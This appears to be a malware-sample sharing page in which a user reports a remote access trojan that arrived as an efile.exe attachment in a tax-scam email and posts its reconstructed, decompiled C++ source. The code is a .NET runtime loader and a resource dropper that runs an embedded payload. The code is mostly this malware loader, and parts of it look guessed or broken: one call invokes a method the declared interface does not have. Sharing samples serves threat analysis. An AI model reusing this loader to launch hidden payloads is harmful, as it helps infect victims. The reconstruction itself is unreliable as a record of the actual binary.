MalwareBazaar Database

fearme

This was sent me by email, it was a Tax scam, basically they told me to pay my taxes lmao, and on there was this efile.exe attachment, which is a RAT made by some very low skilled hackers, i will let the reconstructed decompiled source code below.

EntryPoint:

#include <windows.h>
#include <metahost.h>
#include <stdio.h>

#pragma comment(lib, "mscoree.lib")

int WINAPI WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nShowCmd)
{
HRESULT hr;
ICLRMetaHost *pMetaHost = NULL;
ICLRRuntimeInfo *pRuntimeInfo = NULL;
ICLRRuntimeHost *pRuntimeHost = NULL;
ICLRControl *pCLRControl = NULL;
IUnknown *pAppDomainSetup = NULL;
IUnknown *pAppDomain = NULL;

// Try to set secure DLL loading if available (Windows 8+)
HMODULE hKernel32 = LoadLibraryW(L"kernel32.dll");
if (hKernel32)
{
typedef BOOL (WINAPI *SetDefaultDllDirectories_t)(DWORD);
SetDefaultDllDirectories_t pfnSetDefaultDllDirectories =
(SetDefaultDllDirectories_t)GetProcAddress(hKernel32, "SetDefaultDllDirectories");

if (pfnSetDefaultDllDirectories)
{
pfnSetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32);
}
FreeLibrary(hKernel32);
}

// Try to use CLRCreateInstance first (CLR 4.0+)
HMODULE hMscoree = LoadLibraryW(L"mscoree.dll");
if (hMscoree)
{
typedef HRESULT (WINAPI *CLRCreateInstance_t)(REFCLSID, REFIID, LPVOID*);
CLRCreateInstance_t pfnCLRCreateInstance =
(CLRCreateInstance_t)GetProcAddress(hMscoree, "CLRCreateInstance");

if (pfnCLRCreateInstance)
{
hr = pfnCLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*)&pMetaHost);
if (SUCCEEDED(hr))
{
hr = pMetaHost->GetRuntime(L"v4.0.30319", IID_ICLRRuntimeInfo, (LPVOID*)&pRuntimeInfo);
if (SUCCEEDED(hr))
{
hr = pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID*)&pRuntimeHost);
}
}
}
FreeLibrary(hMscoree);
}

// Fall back to CorBindToRuntimeEx if CLRCreateInstance failed (CLR 2.0)
if (!pRuntimeHost)
{
hr = CorBindToRuntimeEx(
NULL, // Runtime version (NULL = latest)
NULL, // Build flavor (NULL = workstation)
0, // Flags
CLSID_CLRRuntimeHost,
IID_ICLRRuntimeHost,
(LPVOID*)&pRuntimeHost);
}

if (!pRuntimeHost)
{
// Failed to load CLR
return 1;
}

// Start the CLR
hr = pRuntimeHost->Start();

// Get the ICLRControl interface
hr = pRuntimeHost->GetCLRControl(&pCLRControl);

// Create an AppDomain
hr = pRuntimeHost->CreateAppDomainWithManager(
L"_RESOLVER", // Friendly name
0, // Flags
NULL, // AppDomain setup
NULL, // AppDomain manager
&pAppDomain);

// Execute managed code
DWORD retVal;
hr = pRuntimeHost->ExecuteInDefaultAppDomain(
L"ManagedAssembly.dll", // Assembly path
L"ManagedNamespace.ManagedClass", // Type name
L"EntryPoint", // Method name
L"", // Argument
&retVal);

// Clean up
if (pAppDomain) pAppDomain->Release();
if (pCLRControl) pCLRControl->Release();
if (pRuntimeHost) pRuntimeHost->Release();
if (pRuntimeInfo) pRuntimeInfo->Release();
if (pMetaHost) pMetaHost->Release();

return retVal;
}

Resource Malware Dropper:

#include <windows.h>
#include <oleauto.h>
#include <exception>

HRESULT ExecuteEmbeddedResource(
HMODULE hModule,
IUnknown* pRuntimeHost,
const WCHAR* pwzResourceName)
{
// Find and load the embedded resource
HRSRC hRes = FindResourceW(hModule, pwzResourceName, L"FILES");
if (!hRes)
return HRESULT_FROM_WIN32(GetLastError());

HGLOBAL hResData = LoadResource(hModule, hRes);
if (!hResData)
return HRESULT_FROM_WIN32(GetLastError());

LPVOID pResourceData = LockResource(hResData);
if (!pResourceData)
return E_POINTER;

DWORD dwResourceSize = SizeofResource(hModule, hRes);
if (dwResourceSize == 0)
return E_INVALIDARG;

// Create a safe array to hold the resource data
SAFEARRAY* pSafeArray = SafeArrayCreateVector(VT_UI1, 0, dwResourceSize);
if (!pSafeArray)
return E_OUTOFMEMORY;

// Copy resource data into safe array
void* pArrayData = nullptr;
HRESULT hr = SafeArrayAccessData(pSafeArray, &pArrayData);
if (SUCCEEDED(hr))
{
memcpy(pArrayData, pResourceData, dwResourceSize);
SafeArrayUnaccessData(pSafeArray);
}
else
{
SafeArrayDestroy(pSafeArray);
return hr;
}

// Execute the resource through the runtime host
VARIANT vResult;
VariantInit(&vResult);

VARIANT vEmpty;
VariantInit(&vEmpty);

// These appear to be parameters for method invocation
long methodId = 0;
SAFEARRAY* pParams = SafeArrayCreateVector(VT_VARIANT, 0, 0);

// Call the method (likely ExecuteInDefaultAppDomain or similar)
hr = pRuntimeHost->InvokeMethod(
methodId, // Method ID or DISPID
pSafeArray, // Resource data as parameter
&vEmpty, // Optional arguments
pParams, // Method parameters
&vResult); // Return value

// Clean up
VariantClear(&vResult);
VariantClear(&vEmpty);
SafeArrayDestroy(pParams);
SafeArrayDestroy(pSafeArray);

return hr;
}